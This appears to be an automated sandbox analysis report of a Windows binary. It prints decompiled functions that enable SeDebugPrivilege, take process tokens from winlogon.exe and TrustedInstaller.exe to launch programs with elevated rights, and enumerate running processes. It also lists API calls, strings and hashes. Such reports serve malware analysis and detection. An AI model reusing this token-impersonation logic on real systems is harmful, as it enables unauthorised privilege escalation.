				wchar_t* _t125;
				intOrPtr _t131;
				wchar_t* _t132;
				int _t156;
				void* _t159;
				intOrPtr _t162;
				void* _t177;
				void* _t178;
				void* _t179;
				intOrPtr _t181;
				int _t187;
				intOrPtr _t188;
				intOrPtr _t190;
				intOrPtr _t198;
				signed int _t205;
				signed int _t206;

				_t179 = __edx;
				_t158 = __ecx;
				_t206 = _t205 & 0xfffffff8;
				E0040B550(0x1ccc, __ecx);
				_t76 = E0040313D(_t158);
				if(_t76 != 0) {
					E0040AC52();
					SetErrorMode(0x8001); // executed
					_t156 = 0;
					 *0x40fa70 = 0x11223344;
					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
					_t82 = E00405497( &_a8);
					_a48 = 0x20;
					_a40 = 0;
					_a52 = 0;
					_a44 = 0;
					_a56 = 0;
					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}




































                                                                                                                0x00408533
                                                                                                                0x00408533
                                                                                                                0x00408536
                                                                                                                0x0040853e
                                                                                                                0x00408546
                                                                                                                0x0040854d
                                                                                                                0x00408559
                                                                                                                0x00408563
                                                                                                                0x00408569
                                                                                                                0x00408572
                                                                                                                0x00408583
                                                                                                                0x0040858d
                                                                                                                0x00408595
                                                                                                                0x0040859e
                                                                                                                0x004085a2
                                                                                                                0x004085a6
                                                                                                                0x004085aa
                                                                                                                0x004085ae
                                                                                                                0x004085b8
                                                                                                                0x004085c1
                                                                                                                0x004085c8
                                                                                                                0x004085cd
                                                                                                                0x004085cf
                                                                                                                0x0040867f
                                                                                                                0x00408688
                                                                                                                0x0040868d
                                                                                                                0x0040868f
                                                                                                                0x00408730
                                                                                                                0x00408735
                                                                                                                0x00408737
                                                                                                                0x0040873d
                                                                                                                0x00408750
                                                                                                                0x0040875d
                                                                                                                0x00408763
                                                                                                                0x00408770
                                                                                                                0x00408775
                                                                                                                0x00408779
                                                                                                                0x0040878b
                                                                                                                0x00408790
                                                                                                                0x004087a2
                                                                                                                0x004087aa
                                                                                                                0x004087b8
                                                                                                                0x004087be
                                                                                                                0x004087c3
                                                                                                                0x004087c9
                                                                                                                0x004087d2
                                                                                                                0x004087df
                                                                                                                0x004087e3
                                                                                                                0x004087e6
                                                                                                                0x00408801
                                                                                                                0x004087e8
                                                                                                                0x004087f8
                                                                                                                0x004087fe
                                                                                                                0x00408811
                                                                                                                0x00408816
                                                                                                                0x00408816
                                                                                                                0x0040881c
                                                                                                                0x00408822
                                                                                                                0x00408779
                                                                                                                0x00408824
                                                                                                                0x00408829
                                                                                                                0x00408833
                                                                                                                0x00408834
                                                                                                                0x00408840
                                                                                                                0x00408848
                                                                                                                0x0040884c
                                                                                                                0x00408850
                                                                                                                0x00408855
                                                                                                                0x0040885a
                                                                                                                0x00408860
                                                                                                                0x004088ac
                                                                                                                0x004088b1
                                                                                                                0x004088b3
                                                                                                                0x004088bf
                                                                                                                0x004088c5
                                                                                                                0x004088cb
                                                                                                                0x004088da
                                                                                                                0x004088ea
                                                                                                                0x004088ed
                                                                                                                0x004088f8
                                                                                                                0x004088ff
                                                                                                                0x00408905
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x004088b5
                                                                                                                0x00000000
                                                                                                                0x00408862
                                                                                                                0x00408862
                                                                                                                0x0040886d
                                                                                                                0x00408874
                                                                                                                0x0040887b
                                                                                                                0x00408882
                                                                                                                0x00408889
                                                                                                                0x00408895
                                                                                                                0x00408897
                                                                                                                0x00408658
                                                                                                                0x00408658
                                                                                                                0x0040865d
                                                                                                                0x00408661
                                                                                                                0x0040866a
                                                                                                                0x00408673
                                                                                                                0x00408678
                                                                                                                0x00000000
                                                                                                                0x00408678
                                                                                                                0x00408860
                                                                                                                0x00408695
                                                                                                                0x00408695
                                                                                                                0x0040869f
                                                                                                                0x004086a2
                                                                                                                0x004086af
                                                                                                                0x004086a4
                                                                                                                0x004086a7
                                                                                                                0x004086a7
                                                                                                                0x004086b4
                                                                                                                0x004086bf
                                                                                                                0x004086cb
                                                                                                                0x004086d3
                                                                                                                0x004086d7
                                                                                                                0x004086db
                                                                                                                0x004086e0
                                                                                                                0x004086f1
                                                                                                                0x004086f8
                                                                                                                0x004086ff
                                                                                                                0x00408706
                                                                                                                0x0040870d
                                                                                                                0x00408719
                                                                                                                0x0040871b
                                                                                                                0x00000000
                                                                                                                0x0040871b
                                                                                                                0x004085d5
                                                                                                                0x004085da
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004085ec
                                                                                                                0x004085ef
                                                                                                                0x004085f6
                                                                                                                0x004085fd
                                                                                                                0x00408604
                                                                                                                0x0040860b
                                                                                                                0x00408612
                                                                                                                0x00408616
                                                                                                                0x00408620
                                                                                                                0x0040862a
                                                                                                                0x00408632
                                                                                                                0x00408633
                                                                                                                0x00408638
                                                                                                                0x0040864f
                                                                                                                0x00408651
                                                                                                                0x00000000
                                                                                                                0x0040854f
                                                                                                                0x0040854f
                                                                                                                0x00408550
                                                                                                                0x00408556
                                                                                                                0x00408556

                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                  • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                  • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                  • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                                                                • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                                                                • swscanf.MSVCRT ref: 00408620
                                                                                                                • _wtoi.MSVCRT ref: 00408633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                                                                • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                                                                • API String ID: 3933224404-3784219877
                                                                                                                • Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                                                                • Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
                                                                                                                • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 81%
                                                                                                                			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}


































                                                                                                                0x00401fe6
                                                                                                                0x00401ff1
                                                                                                                0x00401ff3
                                                                                                                0x00401fff
                                                                                                                0x00402002
                                                                                                                0x004020a8
                                                                                                                0x004020ab
                                                                                                                0x004020f3
                                                                                                                0x004020f6
                                                                                                                0x00402162
                                                                                                                0x00402165
                                                                                                                0x004021f2
                                                                                                                0x004021f5
                                                                                                                0x00402235
                                                                                                                0x00402238
                                                                                                                0x004022be
                                                                                                                0x0040223a
                                                                                                                0x0040223a
                                                                                                                0x00402240
                                                                                                                0x0040224b
                                                                                                                0x0040224e
                                                                                                                0x00402251
                                                                                                                0x00402254
                                                                                                                0x00402259
                                                                                                                0x0040225e
                                                                                                                0x00402262
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402264
                                                                                                                0x00402262
                                                                                                                0x00402266
                                                                                                                0x0040226c
                                                                                                                0x00402271
                                                                                                                0x00402274
                                                                                                                0x00402276
                                                                                                                0x0040229a
                                                                                                                0x0040229a
                                                                                                                0x00402278
                                                                                                                0x00402296
                                                                                                                0x00402296
                                                                                                                0x0040229c
                                                                                                                0x0040229c
                                                                                                                0x004022c0
                                                                                                                0x004022c2
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x004022c8
                                                                                                                0x00000000
                                                                                                                0x004022c0
                                                                                                                0x00402201
                                                                                                                0x00402203
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402220
                                                                                                                0x00402225
                                                                                                                0x00402227
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00000000
                                                                                                                0x0040222d
                                                                                                                0x00402173
                                                                                                                0x00402179
                                                                                                                0x0040217b
                                                                                                                0x0040217e
                                                                                                                0x00402183
                                                                                                                0x00402185
                                                                                                                0x00402188
                                                                                                                0x0040218d
                                                                                                                0x0040218f
                                                                                                                0x00402192
                                                                                                                0x004021a2
                                                                                                                0x004021a7
                                                                                                                0x004021a9
                                                                                                                0x004021ac
                                                                                                                0x004021cc
                                                                                                                0x004021d1
                                                                                                                0x004021d3
                                                                                                                0x004021db
                                                                                                                0x004021db
                                                                                                                0x004021e1
                                                                                                                0x004021e1
                                                                                                                0x004021e7
                                                                                                                0x004021e7
                                                                                                                0x00000000
                                                                                                                0x00402192
                                                                                                                0x004020fe
                                                                                                                0x00402103
                                                                                                                0x00402105
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402111
                                                                                                                0x00402114
                                                                                                                0x00000000
                                                                                                                0x00402114
                                                                                                                0x004020ad
                                                                                                                0x004020b4
                                                                                                                0x004020b9
                                                                                                                0x004020bc
                                                                                                                0x00000000
                                                                                                                0x004020c2
                                                                                                                0x004020c4
                                                                                                                0x004020ce
                                                                                                                0x004020d0
                                                                                                                0x004020d3
                                                                                                                0x004020d4
                                                                                                                0x004020d5
                                                                                                                0x004020e6
                                                                                                                0x004020e7
                                                                                                                0x004020d7
                                                                                                                0x004020d7
                                                                                                                0x004020dd
                                                                                                                0x004020de
                                                                                                                0x004020df
                                                                                                                0x004020df
                                                                                                                0x004020ec
                                                                                                                0x004020ef
                                                                                                                0x00000000
                                                                                                                0x004020ef
                                                                                                                0x00402008
                                                                                                                0x00402016
                                                                                                                0x0040201d
                                                                                                                0x0040202e
                                                                                                                0x00402035
                                                                                                                0x00402044
                                                                                                                0x00402049
                                                                                                                0x00402055
                                                                                                                0x00402064
                                                                                                                0x00402068
                                                                                                                0x0040206e
                                                                                                                0x0040208b
                                                                                                                0x00402070
                                                                                                                0x00402082
                                                                                                                0x00402088
                                                                                                                0x0040209e
                                                                                                                0x004020a1
                                                                                                                0x00402119
                                                                                                                0x00402119
                                                                                                                0x0040211b
                                                                                                                0x0040211e
                                                                                                                0x0040211e
                                                                                                                0x00402149
                                                                                                                0x00402151
                                                                                                                0x00402151
                                                                                                                0x00402157
                                                                                                                0x00402157
                                                                                                                0x004022cb
                                                                                                                0x004022d2
                                                                                                                0x004022d2

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040201D
                                                                                                                • memset.MSVCRT ref: 00402035
                                                                                                                  • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                  • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                • wcslen.MSVCRT ref: 00402050
                                                                                                                • wcslen.MSVCRT ref: 0040205F
                                                                                                                • wcslen.MSVCRT ref: 004020B4
                                                                                                                • _wtoi.MSVCRT ref: 004020D7
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                                                • OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                                                • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                                                  • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                  • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                  • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                  • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                                                  • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                  • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                  • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                  • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                  • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                  • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                • wcschr.MSVCRT ref: 00402259
                                                                                                                • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                                                • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                                                • API String ID: 3201562063-2355939583
                                                                                                                • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                                                • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                                                • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120processlibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(Process32NextW(_v12,  &_v1136) != 0) {
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}






























                                                                                                                0x00409609
                                                                                                                0x0040960f
                                                                                                                0x00409619
                                                                                                                0x00409623
                                                                                                                0x0040962e
                                                                                                                0x00409633
                                                                                                                0x00409640
                                                                                                                0x0040964a
                                                                                                                0x00409782
                                                                                                                0x0040965a
                                                                                                                0x0040965f
                                                                                                                0x00409678
                                                                                                                0x0040967e
                                                                                                                0x00409681
                                                                                                                0x00409685
                                                                                                                0x00409688
                                                                                                                0x004096b2
                                                                                                                0x004096bf
                                                                                                                0x004096c6
                                                                                                                0x004096cb
                                                                                                                0x004096da
                                                                                                                0x004096e6
                                                                                                                0x0040973b
                                                                                                                0x00409747
                                                                                                                0x0040975f
                                                                                                                0x00409764
                                                                                                                0x0040976a
                                                                                                                0x00409770
                                                                                                                0x00409773
                                                                                                                0x0040977d
                                                                                                                0x00000000
                                                                                                                0x0040977d
                                                                                                                0x004096ee
                                                                                                                0x004096f5
                                                                                                                0x004096fc
                                                                                                                0x00409704
                                                                                                                0x0040970c
                                                                                                                0x0040971c
                                                                                                                0x0040971c
                                                                                                                0x00409704
                                                                                                                0x00409721
                                                                                                                0x00409728
                                                                                                                0x00409739
                                                                                                                0x00409739
                                                                                                                0x00000000
                                                                                                                0x00409728
                                                                                                                0x00409693
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096a5
                                                                                                                0x004096a9
                                                                                                                0x004096ac
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004096ac
                                                                                                                0x004097a6

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                • memset.MSVCRT ref: 0040962E
                                                                                                                • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                                                • memset.MSVCRT ref: 004096C6
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
